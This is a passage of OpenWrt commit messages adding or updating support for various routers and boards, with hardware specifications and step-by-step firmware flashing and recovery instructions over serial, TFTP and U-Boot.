- WLAN: 2x QCA9994 AC Wawe 2 (1x 2GHz bgn, 1x 5GHz acn)
- CC2540 BLE
- UART console on RJ45 next to ethernet ports exposed.
Its Cisco pin compatible, 115200 8n1 baud.
Installation instructions:
Through stock firmware or initramfs.
1.Connect to console
2. Login with root account, if password is unknown then interrupt the boot with f and reset it in failsafe.
3. Transfer factory image
4. Flash the image with ubiformat /dev/mtd1 -y -f <your factory image path>
This will replace the rootfs2 with OpenWrt, if you are currently running from rootfs2 then simply change /dev/mtd1 to /dev/mtd0
1. Connect to console
2. Transfer the image from TFTP server with tftpboot,
or by using DHCP advertised image with dhcp command.
3. bootm
4. Run ubiformat /dev/mtd1
You need to interrupt the bootloader after rebooting and run:
run altbootcmd
This will switch your active rootfs partition to one you wrote to and boot from it.
So if rootfs1 is active, then it will change it to rootfs2.
This will format the rootfs2 partition, if your active partition is 2 then simply change /dev/mtd1 with /dev/mtd0
If you dont format the partition you will be writing too, then sysupgrade will find existing UBI rootfs and kernel volumes and update those.
This will result in wrong ordering and OpenWrt will panic on boot.
5. Transfer sysupgrade image
6. Flash with sysupgrade -n.
Note that sysupgrade will write the image to rootfs partition that is not currently in use.
Signed-off-by: Robert Marko <>
On the Turris Omnia 2019, u-boot environment is located at 0xF0000, instead
of 0xC0000. The switch happened with u-boot-omnia package version 2019-04-2
(May 10, 2019).
Check the installed u-boot release, and set the default accordingly.
Signed-off-by: Klaus Kudielka <>
[bump PKG_RELEASE, use lower case for hex offset]
Signed-off-by: Adrian Schmutzler <>
The RAVPower RP-WD03 is a battery powered router, with an Ethernet and
USB port. Due due a limitation in the vendor supplied U-Boot bootloader,
we cannot exceed a 1.5 MB kernel size, as is the case with recent builds
(i.e. post v19.07). This breaks both factory and sysupgrade images.
To address this, use the lzma loader (loader-okli) to work around this
The improvements here also address the "misplaced" U-Boot environment
partition, which is located between the kernel and rootfs in the stock
image / implementation. This is addressed by making use of mtd-concat,
maximizing space available in the booted image.
This will make sysupgrade from earlier versions impossible.
Changes are based on the recently supported HooToo HT-TM05, as the
hardware is almost identical (except for RAM size) and is from the same
vendor (SunValley). While at it, also change the SPI frequency
- Download the needed OpenWrt install files, place them in the root
of a clean TFTP server running on your computer. Rename the files as,
- openwrt-ramips-mt7620-ravpower_rp-wd03-squashfs-kernel.bin => kernel
- openwrt-ramips-mt7620-ravpower_rp-wd03-squashfs-rootfs.bin => rootfs
- Plug the router into your computer via Ethernet
- Set your computer to use as its IP address
- With your router shut down, hold down the power button until the first
white LED lights up.
- Push and hold the reset button and release the power button. Continue
holding the reset button for 30 seconds or until it begins searching
for files on your TFTP server, whichever comes first.
- The router ( will look for your computer at
and install the two files. Once it has finished installation, it will
automatically reboot and start up OpenWrt.
- Set your computer to use DHCP for its IP address
- U-Boot environment can be modified, u-boot-env is preserved on initial
install or sysupgrade
- mtd-concat functionality is included, to leave a "hole" for u-boot-env,
combining the OEM kernel and rootfs partitions
Most of the changes in this commit are the work of Russell Morris (as
credited below), I only wrapped them up and added compat-version.
Thanks to @mpratt14 and @xabolcs for their help getting the lzma loader
to work!
Fixes: 5ef79af4f8 ("ramips: add support for Ravpower WD03")
Suggested-by: Russell Morris <>
Signed-off-by: Adrian Schmutzler <>
The HooToo HT-TM05 is a battery powered router, with an Ethernet and USB port.
Vendor U-Boot limited to 1.5 MB kernel size, so use lzma loader (loader-okli).
SOC: MediaTek MT7620N
BATTERY: 10400mAh
WLAN: 802.11bgn
LAN: 1x 10/100 Mbps Ethernet
USB: 1x USB 2.0 (Type-A)
RAM: 64 MB
FLASH: GigaDevice GD25Q64, Serial 8 MB Flash, clocked at 50 MHz
Flash itself specified to 80 MHz, but speed limited by mt7620 SPI
fast-read enabled (m25p)
LED: Status LED (blue after boot, green with WiFi traffic
4 leds to indicate power level of the battery (unable to control)
INPUT: Power, reset button
MAC assignment based on vendor firmware:
2.4 GHz *:b4 (factory 0x04)
LAN/label *:b4 (factory 0x28)
WAN *:b5 (factory 0x2e)
Tested and working:
- Ethernet
- 2.4 GHz WiFi (Correct MAC-address)
- Installation from TFTP (recovery)
- OpenWRT sysupgrade (Preserving and non-preserving), through the usual
ways: command line and LuCI
- LEDs (except as noted above)
- Button (reset)
- I2C, which is needed for reading battery charge status and level
- U-Boot environment / variables (from U-Boot, and OpenWrt)
- Download the needed OpenWrt install files, place them in the root
of a clean TFTP server running on your computer. Rename the files as,
- ramips-mt7620-hootoo_tm05-squashfs-kernel.bin => kernel
- ramips-mt7620-hootoo_tm05-squashfs-rootfs.bin => rootfs
- Plug the router into your computer via Ethernet
- Set your computer to use as its IP address
- With your router shut down, hold down the power button until the first
white LED lights up.
- Push and hold the reset button and release the power button. Continue
holding the reset button for 30 seconds or until it begins searching
for files on your TFTP server, whichever comes first.
- The router ( will look for your computer at
and install the two files. Once it has finished installation, it will
automatically reboot and start up OpenWrt.
- Set your computer to use DHCP for its IP address
- U-Boot environment can be modified, u-boot-env is preserved on initial
install or sysupgrade
- mtd-concat functionality is included, to leave a "hole" for u-boot-env,
combining the OEM kernel and rootfs partitions
I would like to thank @mpratt14 and @xabolcs for their help getting the
lzma loader to work!
Signed-off-by: Russell Morris <>
[drop changes in image/Makefile, fix indent and PKG_RELEASE in
uboot-envtools, fix LOADER_FLASH_OFFS, minor commit message facelift,
add COMPILE to Device/Default]
Signed-off-by: Adrian Schmutzler <>
Engenius ENH202 is an outdoor wireless access point with 2 10/100 ports,
built-in ethernet switch, internal antenna plates and proprietery PoE.
- Qualcomm/Atheros AR7240 rev 2
- 40 MHz reference clock
- 8 MB FLASH ST25P64V6P (aka ST M25P64)
- 32 MB RAM
- UART at J3 (populated)
- 2x 10/100 Mbps Ethernet (built-in switch at gmac1)
- 2.4 GHz, 2x2, 29dBm (Atheros AR9280 rev 2)
- internal antenna plates (10 dbi, semi-directional)
- 5 LEDs, 1 button (LAN, WAN, RSSI) (Reset)
Known Issues:
- Sysupgrade from ar71xx no longer possible
- Power LED not controllable, or unknown gpio
MAC addresses:
eth0/eth1 *:11 art 0x0/0x6
wlan *:10 art 0x120c
The device label lists both addresses, WLAN MAC and ETH MAC,
in that order.
Since 0x0 and 0x6 have the same content, it cannot be
determined which is eth0 and eth1, so we chose 0x0 for both.
2 ways to flash factory.bin from OEM:
- Connect ethernet directly to board (the non POE port)
this is LAN for all images
- if you get Failsafe Mode from failed flash:
only use it to flash Original firmware from Engenius
or risk kernel loop or halt which requires serial cable
Method 1: Firmware upgrade page:
OEM webpage at
username and password "admin"
In upper right select Reset
"Restore to factory default settings"
Wait for reboot and login again
Navigate to "Firmware Upgrade" page from left pane
Click Browse and select the factory.bin image
Upload and verify checksum
Click Continue to confirm and wait 3 minutes
Method 2: Serial to load Failsafe webpage:
After connecting to serial console and rebooting...
Interrupt boot with any key pressed rapidly
execute `run failsafe_boot` OR `bootm 0x9f670000`
wait a minute
connect to ethernet and navigate to
Select the factory.bin image and upload
wait about 3 minutes
Return to OEM:
If you have a serial cable, see Serial Failsafe instructions
The Failsafe image is unique to Engenius boards.
If the failsafe image is missing or damaged this will not work
DO NOT downgrade to ar71xx this way, can cause kernel loop or halt
The easiest way to return to the OEM software is the Failsafe image
If you dont have a serial cable, you can ssh into openwrt and run
`mtd -r erase fakeroot`
Wait 3 minutes
connect to ethernet and navigate to
select OEM firmware image from Engenius and click upgrade
Format of OEM firmware image:
The OEM software of ENH202 is a heavily modified version
of Openwrt Kamikaze bleeding-edge. One of the many modifications
is to the sysupgrade program. Image verification is performed
simply by the successful ungzip and untar of the supplied file
and name check and header verification of the resulting contents.
To form a factory.bin that is accepted by OEM Openwrt build,
the kernel and rootfs must have specific names...
and begin with the respective headers (uImage, squashfs).
Then the files must be tarballed and gzipped.
The resulting binary is actually a tar.gz file in disguise.
This can be verified by using binwalk on the OEM firmware images,
ungzipping then untaring, and by swapping headers to see
what the OEM upgrade utility accepts and rejects.
OKLI kernel loader is required because the OEM firmware
expects the kernel to be no greater than 1024k
and the factory.bin upgrade procedure would otherwise
overwrite part of the kernel when writing rootfs.
Note on built-in switch:
ENH202 is originally configured to be an access point,
but with two ethernet ports, both WAN and LAN is possible.
the POE port is gmac0 which is preferred to be
the port for WAN because it gives link status
where swconfig does not.
Signed-off-by: Michael Pratt <>
[assign label_mac in 02_network, use ucidef_set_interface_wan,
use common device definition, some reordering]
Signed-off-by: Adrian Schmutzler <>
Engenius ENS202EXT v1 is an outdoor wireless access point with 2 10/100 ports,
with built-in ethernet switch, detachable antennas and proprietery PoE.
- Qualcomm/Atheros AR9341 v1
- 535/400/200/40 MHz (CPU/DDR/AHB/REF)
- 64 MB of RAM
- 16 MB of FLASH MX25L12835F(MI-10G)
- UART (J1) header on PCB (unpopulated)
- 2x 10/100 Mbps Ethernet (built-in switch Atheros AR8229)
- 2.4 GHz, up to 27dBm (Atheros AR9340)
- 2x external, detachable antennas
- 7x LED (5 programmable in ath79), 1x GPIO button (Reset)
Known Issues:
- Sysupgrade from ar71xx no longer possible
- Ethernet LEDs stay on solid when connected, not programmable
MAC addresses:
eth0/eth1 *:7b art 0x0/0x6
wlan *:7a art 0x1002
The device label lists both addresses, WLAN MAC and ETH MAC,
in that order.
Since 0x0 and 0x6 have the same content, it cannot be
determined which is eth0 and eth1, so we chose 0x0 for both.
2 ways to flash factory.bin from OEM:
- Connect ethernet directly to board (the non POE port)
this is LAN for all images
- if you get Failsafe Mode from failed flash:
only use it to flash Original firmware from Engenius
or risk kernel loop which requires serial cable
Method 1: Firmware upgrade page:
OEM webpage at
username and password "admin"
In upper right select Reset
"Restore to factory default settings"
Wait for reboot and login again
Navigate to "Firmware Upgrade" page from left pane
Click Browse and select the factory.bin image
Upload and verify checksum
Click Continue to confirm and wait 3 minutes
Method 2: Serial to load Failsafe webpage:
After connecting to serial console and rebooting...
Interrupt boot with any key pressed rapidly
execute `run failsafe_boot` OR `bootm 0x9fdf0000`
wait a minute
connect to ethernet and navigate to
Select the factory.bin image and upload
wait about 3 minutes
*If you are unable to get network/LuCI after flashing*
You must perform another factory reset:
After waiting 3 minutes or when Power LED stop blinking:
Hold Reset button for 15 seconds while powered on
or until Power LED blinks very fast
release and wait 2 minutes
Return to OEM:
If you have a serial cable, see Serial Failsafe instructions
The Failsafe image is unique to this model.
The following directions are unique to this model.
DO NOT downgrade to ar71xx this way, can cause kernel loop
The easiest way to return to the OEM software is the Failsafe image
If you dont have a serial cable, you can ssh into openwrt and run
`mtd -r erase fakeroot`
Wait 3 minutes
connect to ethernet and navigate to
select OEM firmware image from Engenius and click upgrade
TFTP Recovery:
For some reason, TFTP is not reliable on this board.
Takes many attempts, many timeouts before it fully transfers.
Starting with an initramfs.bin:
Connect to ethernet
set IP address and TFTP server to
set up infinite ping to
rename the initramfs.bin to "vmlinux-art-ramdisk" and host on TFTP server
disconnect power to the board
hold reset button while powering on board for 8 seconds
Wait a minute, power LED should blink eventually if successful
and a minute after that the pings should get replies
You have now loaded a temporary Openwrt with default settings temporarily.
You can use that image to sysupgrade another image to overwrite flash.
Format of OEM firmware image:
The OEM software of ENS202EXT is a heavily modified version
of Openwrt Kamikaze bleeding-edge. One of the many modifications
is to the sysupgrade program. Image verification is performed
simply by the successful ungzip and untar of the supplied file
and name check and header verification of the resulting contents.
To form a factory.bin that is accepted by OEM Openwrt build,
the kernel and rootfs must have specific names...
and begin with the respective headers (uImage, squashfs).
Then the files must be tarballed and gzipped.
The resulting binary is actually a tar.gz file in disguise.
This can be verified by using binwalk on the OEM firmware images,
ungzipping then untaring, and by swapping headers to see
what the OEM upgrade utility accepts and rejects.
Note on the factory.bin:
The newest kernel is too large to be in the kernel partition
the new ath79 kernel is beyond 1592k
Even ath79-tiny is 1580k
Checksum fails at boot because the bootloader (modified uboot)
expects kernel to be 1536k. If the kernel is larger, it gets
overwritten when rootfs is flashed, causing a broken image.
The mtdparts variable is part of the build and saving a new
uboot environment will not persist after flashing.
OEM version might interact with uboot or with the custom
OEM partition at 0x9f050000.
Failed checksums at boot cause failsafe image to launch,
allowing any image to be flashed again.
HOWEVER: one should not install older Openwrt from failsafe
because it can cause rootfs to be unmountable,
causing kernel loop after successful checksum.
The only way to rescue after that is with a serial cable.
For these reasons, a fake kernel (OKLI kernel loader)
and fake squashfs rootfs is implemented to take care of
the OEM firmware image verification and checksums at boot.
The OEM only verifies the checksum of the first image
of each partition respectively, which is the loader
and the fake squashfs. This completely frees
the "firmware" partition from all checks.
virtual_flash is implemented to make use of the wasted space.
this leaves only 2 erase blocks actually wasted.
The loader and fakeroot partitions must remain intact, otherwise
the next boot will fail, redirecting to the Failsafe image.
Because the partition table required is so different
than the OEM partition table and ar71xx partition table,
sysupgrades are not possible until one switches to ath79 kernel.
Note on sysupgrade.tgz:
To make things even more complicated, another change is needed to
fix an issue where network does not work after flashing from either
OEM software or Failsafe image, which implants the OEM (Openwrt Kamikaze)
configuration into the jffs2 /overlay when writing rootfs from factory.bin.
The upgrade script has this:
mtd -j "/tmp/_sys/sysupgrade.tgz" write "${rootfs}" "rootfs"
However, it also accepts scripts before and after:
Thus, we can solve the issue by making the .tgz an empty file
by making a in the factory.bin
Note on built-in switch:
There is two ports on the board, POE through the power supply brick,
the other is on the board. For whatever reason, in the ar71xx target,
both ports were on the built-in switch on eth1. In order to make use
of a port for WAN or a different LAN, one has to set up VLANs.
In ath79, eth0 and eth1 is defined in the DTS so that the
built-in switch is seen as eth0, but only for 1 port
the other port is on eth1 without a built-in switch.
eth0: switch0
CPU is port 0
board port is port 1
eth1: POE port on the power brick
Since there is two physical ports,
it can be configured as a full router,
with LAN for both wired and wireless.
According to the Datasheet, the port that is not on the switch
is connected to gmac0. It is preferred that gmac0 is chosen as WAN
over a port on an internal switch, so that link status can pass
to the kernel immediately which is more important for WAN connections.
Signed-off-by: Michael Pratt <>
[apply sorting in 01_leds, make factory recipe more generic, create common
device node, move label-mac to 02_network, add MAC addresses to commit
message, remove kmod-leds-gpio, use gzip directly]
Signed-off-by: Adrian Schmutzler <>
This target has been mostly replaced by ath79 and won't be included
in the upcoming release anymore. Finally put it to rest.
This also removes all references in packages, tools, etc. as well as
the uboot-ar71xx and vsc73x5-ucode packages.
Signed-off-by: Adrian Schmutzler <>
This introduces the vendor_model scheme to this target in order to
harmonize device names within the target and with the rest of
OpenWrt. In addition, custom board names are dropped in favor
of the generic script which takes the compatible.
Use the SUPPORTED_DEVICES variable to store the compatible where it
deviates from the device name, so we can use it in build recipes.
While at it, harmonize a few indents as well.
Signed-off-by: Adrian Schmutzler <>
ALLNET ALL-WAP02860AC is a dual-band wireless access point.
SoC: Qualcomm Atheros QCA9558
RAM: 128 MB DDR2
Flash: 16 MB SPI NOR
WIFI: 2.4 GHz 3T3R integrated
5 GHz 3T3R QCA9880 Mini PCIe card
Ethernet: 1x 10/100/1000 Mbps AR8035-A, PoE capable (802.3at)
LEDS: 5x, which four are GPIO controlled
Buttons: 1x GPIO controlled
UART: 4 pin header near Mini PCIe card, starting count from white
triangle on PCB
1. VCC 3.3V, 2. GND, 3. TX, 4. RX
baud: 115200, parity: none, flow control: none
MAC addresses
Calibration data does not contain valid MAC addresses.
The calculated MAC addresses are chosen in accordance with OEM firmware.
Because of:
a) constrained environment (SNMP) when connecting through Telnet
or SSH,
b) hard-coded kernel and rootfs sizes,
c) checksum verification of kerenel and rootfs images in bootloder,
creating factory image accepted by OEM web interface is difficult,
therefore, to install OpenWrt on this device UART connection is needed.
The teardown is simple, unscrew four screws to disassemble the casing,
plus two screws to separate mainboard from the casing.
Before flashing, be sure to have a copy of factory firmware, in case You
wish to revert to original firmware.
1. Prepare TFTP server with OpenWrt initramfs-kernel image.
2. Connect to LAN port.
3. Connect to UART port.
4. Power on the device and when prompted to stop autoboot, hit any key.
5. Alter U-Boot environment with following commands:
setenv failsafe_boot bootm 0x9f0a0000
6. Adjust "ipaddr" and "serverip" addresses in U-Boot environment, use
'setenv' to do that, then run following commands:
tftpboot 0x81000000 <openwrt_initramfs-kernel_image_name>
bootm 0x81000000
7. Wait about 1 minute for OpenWrt to boot.
8. Transfer OpenWrt sysupgrade image to /tmp directory and flash it
sysupgrade -n /tmp/<openwrt_sysupgrade_image_name>
9. After flashing, the access point will reboot to OpenWrt. Wait few
minutes, until the Power LED stops blinking, then it's ready for
Signed-off-by: Tomasz Maciej Nowak <>
[add MAC address comment to commit message]
Signed-off-by: Adrian Schmutzler <>
Now that my patches have been merged into upstream U-Boot, resync the
cosmetic changes and the commit IDs from the final commits.
Signed-off-by: David Woodhouse <>
This adds support for ZyXEL NBG6616 uboot-env access
Signed-off-by: Christoph Krapp <>
[add "ar71xx" to commit title]
Signed-off-by: Adrian Schmutzler <>
This patch adds support for the WNDR4300TN, marketed by Belgian ISP
Telenet. The hardware is the same as the WNDR4300 v1, without the
fifth ethernet port (WAN) and the USB port. The circuit board has
the traces, but the components are missing.
* SoC: Atheros AR9344
* RAM: 128 MB
* Flash: 128 MB NAND flash
* WiFi: Atheros AR9580 (5 GHz) and AR9344 (2.4 GHz)
* Ethernet: 4x 1000Base-T
* LED: Power, LAN, WiFi 2.4GHz, WiFi 5GHz, WPS
* UART: on board, to the right of the RF shield at the top of the board
* Flashing through the OEM web interface:
+ Connect your computer to the router with an ethernet cable and browse
+ Log in with the default credentials are admin:password
+ Browse to Advanced > Administration > Firmware Upgrade in the Telenet
+ Upload the Openwrt firmware: openwrt-ath79-nand-netgear_wndr4300tn-squashfs-factory.img
+ Proceed with the firmware installation and give the device a few
minutes to finish and reboot.
* Flashing through TFTP:
+ Configure your wired client with a static IP in the 192.168.1.x range,
e.g. and netmask
+ Power off the router.
+ Press and hold the RESET button (the factory reset button on the bottom
of the device, with the gray circle around it, next to the Telenet logo)
and turn the router on while keeping the button pressed.
+ The power LED will start flashing orange. You can release the button
once it switches to flashing green.
+ Transfer the image over TFTP:
$ tftp -m binary -c put openwrt-ath79-nand-netgear_wndr4300tn-squashfs-factory.img
Signed-off-by: Davy Hollevoet <>
[use DT label reference for adding LEDs in DTSI files]
Signed-off-by: Adrian Schmutzler <>
This replaces the internal device names "Audi" and "Viper" with the
real model names, which a user would look for. This makes the
Linksys devices on this target consistent with the names recently
changed for mvebu based on the same idea.
As a consequence, the "viper" device definition is split into two
separate definitions with the correct names for both real models.
Signed-off-by: Adrian Schmutzler <>
Update the U-Boot to version v2020.07. Also replace the Makefile rewrite
with a proper patch, explaining why this hack is needed.
Run-tested: FriendlyARM NanoPi R2S
Signed-off-by: David Bauer <>
also install the firmware for all the supported boards
Signed-off-by: Lucian Cristian <>
[fix ATF blob path in uboot-rockchip]
Signed-off-by: David Bauer <>
In imx6, we currently use the model from DTS to derive a board name
manually in /lib/
However, if we have individual DTS files anyway, we can exploit
generic 02_sysinfo and use the compatible as board name directly.
While at it, remove the wildcards from /lib/upgrade/ as
these might make code shorter, but are quite unpleasant when grepping
for a specific device.
Signed-off-by: Adrian Schmutzler <>
OpenWrt lately has harmonized device (definition) names to the
pattern vendor_model to improve overall consistency, also with
other values like the DTS compatible.
This patch applies that scheme to the layerscape target.
Since this (intentionally) creates a bigger overlap between DTS names,
compatible, and device definition name, it also moves DEVICE_DTS and
SUPPORTED_DEVICES definitions to the Device/Default blocks.
Apart from that, it also modifies several packages to use consistent
naming in order to keep the $(1) file references working.
While at it, remove one layer of complexity for the setup in
tfa-layerscape package.
Signed-off-by: Adrian Schmutzler <>
Ever since this package was introduced, the SDK for mt7629 failed to
build as it started failing on this package.
Fixed by porting Hauke's similar patch for uboot-sunxi to uboot-mediatek.
Signed-off-by: Rosen Penev <>
* SoC: MediaTek MT7621A (880 MHz 2c/4t)
* RAM: Nanya NT5CC128M16IP-DIT (256M DDR3-1600)
* Flash: Macronix MX30LF1G18AC-TI (128M NAND)
* Eth: MediaTek MT7621A (10/100/1000 Mbps x5)
* Radio: MT7615N (2.4 GHz & 5 GHz)
4 antennae: 1 internal and 3 non-deatachable
* USB: 3.0 (x1)
* LEDs:
White (x1 logo)
Green (x6 eth + wps)
Orange (x5, hardware-bound)
* Buttons:
Reset (x1)
WPS (x1)
Everything works! Been running it for a couple weeks now and haven't had
any problems. Please let me know if you run into any.
Flash factory image through GUI.
This might fail due to the A/B nature of this device. When flashing, OEM
firmware writes over the non-booted partition. If booted from 'A',
flashing over 'B' won't work. To get around this, you should flash the
OEM image over itself. This will then boot the router from 'B' and
allow you to flash OpenWRT without problems.
Reverting to factory firmware:
Hard-reset the router three times to force it to boot from 'B.' This is
where the stock firmware resides. To remove any traces of OpenWRT from
your router simply flash the OEM image at this point.
Signed-off-by: Santiago Rodriguez-Papa <>
[use v1 only, minor DTS adjustments, use LINKSYS_HWNAME and add it to
DEVICE_VARS, wrap DEVICE_PACKAGES, adjust commit message/title]
Signed-off-by: Adrian Schmutzler <>
Add support for Marvell MACCHIATObin Single Shot, cortex-a72 based
Marvell ARMADA 8040 Community board. Single Shot was broken as the
device tree is different on the Double Shot Board.
- Quad core Cortex-A72 (up to 2GHz)
- DDR4 DIMM slot with optional ECC and single/dual chip select support
- Dual 10GbE (1/2.5/10GbE) SFP+
2.5GbE (1/2.5GbE) via SFP
1GbE via copper
- SPI Flash
- 3 X SATA 3.0 connectors
- MicroSD connector
- eMMC
- PCI x4 3.0 slot
- USB 2.0 Headers (Internal)
- USB 3.0 connector
- Console port (UART) over microUSB connector
- 20-pin Connector for CPU JTAG debugger
- 2 X UART Headers
- 12V input via DC Jack
- ATX type power connector
- Form Factor: Mini-ITX (170 mm x 170 mm)
More details at
Write the Image to your Micro SD Card and insert it in the
MACCHIATObin Single Shot SD Card Slot.
In the U-Boot Environment:
1. reset U-Boot environment:
env default -a
2. prepare U-Boot with boot script:
setenv bootcmd "load mmc 1:1 0x4d00000 boot.scr; source 0x4d00000"
or manually (hanging lines indicate wrapped one-line command):
setenv fdt_name armada-8040-mcbin-singleshot.dtb
setenv image_name Image
setenv bootcmd 'mmc dev 1; ext4load mmc 1:1 $kernel_addr
$image_name;ext4load mmc 1:1 $fdt_addr $fdt_name;setenv
bootargs $console root=/dev/mmcblk1p2 rw rootwait; booti
$kernel_addr - $fdt_addr'
On newer Bootloaders (18.12) the Variables have been changed, use:
setenv fdt_name armada-8040-mcbin-singleshot.dtb
setenv image_name Image
setenv bootcmd 'mmc dev 1; ext4load mmc 1:1 $kernel_addr_r
$image_name;ext4load mmc 1:1 $fdt_addr_r $fdt_name;setenv
bootargs $console root=/dev/mmcblk1p2 rw rootwait; booti
$kernel_addr_r - $fdt_addr_r'
Reported-by: Alexandra Alth <>
Signed-off-by: Tomasz Maciej Nowak <>
Tested-by: Alexandra Alth <>
[add specs and installation as provided by Alexandra Alth]
Signed-off-by: Adrian Schmutzler <>
Between kernels 4.20 and 5.0, a new variant of this board has been
introduced ("Single Shot"), and the existing one has been renamed
with the appendix "Double Shot". [1]
This also adjusted the first compatible in the list:
marvell,armada8040-mcbin -> marvell,armada8040-mcbin-doubleshot
This patch updates the OpenWrt implementation of this device by
adjusting the relevant references to that compatible (i.e., our
board name).
To still provide support for 4.19 with our setup, this adds a
small patch to change the compatible there as well.
Cc: Tomasz Maciej Nowak <>
Signed-off-by: Adrian Schmutzler <>
Reviewed-by: Tomasz Maciej Nowak <>
There had been an issue in Layerscape QSPI driver for very long
time, which made squashfs,jffs2 rootfs not work on QSPI NOR.
And the ubifs had been used as a workaround.
Now the issue has been fixed. So convert to use squashfs,jffs2
rootfs on QSPI NOR for Layerscape boards (LS1012ARDB/LS1046ARDB/
LS1088ARDB), and update u-boot bootargs for booting.
Signed-off-by: Yangbo Lu <>
The block index of u-boot-env changed from mtd1 to mtd3 after upgrading kernel to 5.4.
This patch search the mtd block by label name, work as expect when perform a clean flash.
Signed-off-by: Huangbin Zhan <>
Arduino Yun is a microcontroller development board, based on Atmel
ATmega32u4 and Atheros AR9331.
- MCU: ATmega32U4
- SoC: AR9331
- RAM: DDR2 64MB
- Flash: SPI NOR 16MB
- WiFi:
- 2.4GHz: SoC internal
- Ethernet: 1x 10/100Mbps
- USB: 1x 2.0
- MicroSD: 1x SDHC
- Stock firmware is based on OpenWrt AA.
- The SoC UART can be accessed only through the MCU.
YunSerialTerminal is recommended for access to serial console.
- Stock firmware uses non-standard 250000 baudrate by default.
- The MCU can be reprogrammed from the SoC with avrdude linuxgpio.
1. Update U-Boot environment variables to adapt to new partition scheme.
> setenv bootcmd "run addboard; run addtty; run addparts; run addrootfs; bootm 0x9f050000 || bootm 0x9fea0000"
> setenv mtdparts "spi0.0:256k(u-boot)ro,64k(u-boot-env),15936k(firmware),64k(nvram),64k(art)ro"
> saveenv
2. Boot into stock firmware normally and perform sysupgrade with
sysupgrade image.
# sysupgrade -n -F /tmp/sysupgrade.bin
Signed-off-by: Sungbo Eo <>
Instead of building in a default environment which loads our environment
from the FAT partition.... just ask U-Boot to do it.
Submitted upstream at
Signed-off-by: David Woodhouse <>
For building full SD/eMMC images for Banana Pi R2 we'll want a u-boot
image built for that platform.
Signed-off-by: David Woodhouse <>
Download the boot preloader code from the Banana Pi github repo and make
it available for bootable SD card image creation.
Supports only Banana Pi R2 for now.
Based on work by Alexey Loukianov <> and others.
Signed-off-by: David Woodhouse <>
This patch adds support for the Linksys EA7500 V1 router.
- CPU: Qualcomm IPQ8064
- RAM: 256MB
- Flash: NAND 128MB
- WiFi: QCA9982 an+ac + QCA9983 bgn
- Ethernet: 5 GBE Ports (WAN+ 4xLAN) (QCA8337)
- USB: 1x USB 3.0 1x USB2.0
- Serial console: RJ-45 115200 8n1 (1V8 Voltage level)
- 2 Buttons
- 1 LED
Known issues:
- Some devices won't flash via web gui
- Newer stock images doesn't allow to install custom firmware.
- Please downgrade software to 1.1.2 version. Official firmware:
- Do it two times to downgrade all stored images.
- Apply factory image via web-gui.
Serial + TFTP method:
- downgrade to 1.1.2 two times
- connect ehternet and serial cable
- set ip address of tftp server to
- put openwrt factory image to tftp folder and rename it to macan.bin
- stop device while booting in u-boot
- run command: "run flashimg"
- run command: "setenv boot_part 1"
- run command "saveenv"
- reset
Back to stock:
- Please use old non-gpg image like this 1.1.2:
- ssh to router and copy image to tmp
- use sysupgrade -n -F
Tested by github users: @jack338c and @grzesiczek1
Signed-off-by: Pawel Dembicki <>
[removed i2c4_pins, mdio0_pins, nand_pins, rgmii2_pins from DTSI]
Signed-off-by: Adrian Schmutzler <>
Buffalo WTR-M2133HP is a Tri-Band router based on IPQ4019.
- SoC: Qualcomm IPQ4019
- RAM: 512MiB
- Flash Memory: NAND 128MiB (MXIC MX30LF1G18AC)
- Wi-Fi: Qualcomm IPQ4019 (2.4GHz, 1ch - 13ch)
- Wi-Fi: Qualcomm IPQ4019 (5GHz, 36ch - 64ch)
- Wi-Fi: Qualcomm QCA9984 (2T2R, 5GHz, 100ch - 140ch)
- Ethernet: 4x 10/100/1000 Mbps (1x WAN, 3x LAN)
- LED: 4x white LED, 4x orange LED, 1x blue LED
- USB: 1x USB 3.0 port
- Input: 2x tactile switch, 2x slide switch (2x SP3T)
- Serial console: 115200bps, pinheader JP5 on PCB
- Power: DC 12V 2A
Flash instruction
1. Set up a TFTP server (IP address:
2. Rename "initramfs-fit-uImage.itb" to "WTR-M2133HP-initramfs.uImage"
and put it into the TFTP server directory.
3. Connect the TFTP server and WTR-M2133HP.
4. Hold down the AOSS button, then power on the router.
5. After booting OpenWrt initramfs image, connect to the router by SSH.
6. Transfer "squashfs-nand-factory.ubi" to the router.
7. Execute the following commands.
# ubidetach -p /dev/mtd15
# ubiformat /dev/mtd15 -f /tmp/openwrt-ipq40xx-generic-buffalo_wtr-m2133hp-squashfs-nand-factory.ubi
# fw_setenv bootcmd bootipq
8. Perform reboot.
Recover to stock firmware
1. Execute the following command.
# fw_setenv bootcmd bootbf
2. Reboot and wait several minutes.
Signed-off-by: Yanase Yuki <>
Zyxel NSA310S is a NAS based on Marvell kirkwood SoC.
- Processor Marvell 88F6702 1 GHz
- 256MB RAM
- 128MB NAND
- 1x GBE LAN port (PHY: Marvell 88E1318)
- 2x USB 2.0
- 1x SATA
- 3x button
- 7x leds
- serial on J1 connector (115200 8N1) (GND-NOPIN-RX-TX-VCC)
Known issues:
- no kernel module for RTC. [*]
- buzzer (connected to MPP43) need to be drived by 1kHz signal
- no kernel module for internal MCU connected via I2C[**]
Karoly Pocsi made simple, unofficial driver for HT1382.
It can be found here:
Karoly Pocsi found how CPU talk with MCU:
It is possible to query the MCU-controlled fan speed and temperature:
i2cget -y 0x0 0x0a 0x07
i2cget -y 0x0 0x0a 0x08
The first value (0x07) is the temperature in ° C, the second (0x08) is
the time in milliseconds to complete one fan revolution (rpm = 60,000 / value).
Info translated from:
1. Run serial console and go to u-boot.
2. Copy u-boot via tftp and write to NAND:
=> mw 0x0800000 0xffff 0x100000
=> nand erase 0x0 100000
=> setenv ipaddr
=> setenv serverip
=> tftp 0x0800000 nsa310s-u-boot.kwb
=> nand write 0x0800000 0x0 0x100000
=> reset
3. Run new u-Boot, repair bootcmd and restore MAC address from sticker
=> setenv ethaddr AA:BB:CC:DD:EE:FF
=> saveenv
4. Copy and run initramfs image
=> setenv ipaddr
=> setenv serverip
=> tftpboot zyxel_nsa310s-initramfs-uImage
=> bootm 0x800000
5. Download sysupgrade image and perform sysupgrade
1. Prepare usb fat32 drive with u-boot.kwb and initramfs image.
Stick it to USB 2.0 port.
2. Run serial console and go to u-boot.
3. Copy u-boot from usb and write to NAND:
=> mw 0x0800000 0xffff 0x100000
=> nand erase 0x0 100000
=> usb start
=> fatload usb 0 0x0800000 u-boot.kwb
=> nand write 0x0800000 0x0 0x100000
=> reset
4. Run new u-Boot, repair bootcmd and restore MAC address from sticker
=> setenv ethaddr AA:BB:CC:DD:EE:FF
=> saveenv
5. Copy and run initramfs image:
=> usb start
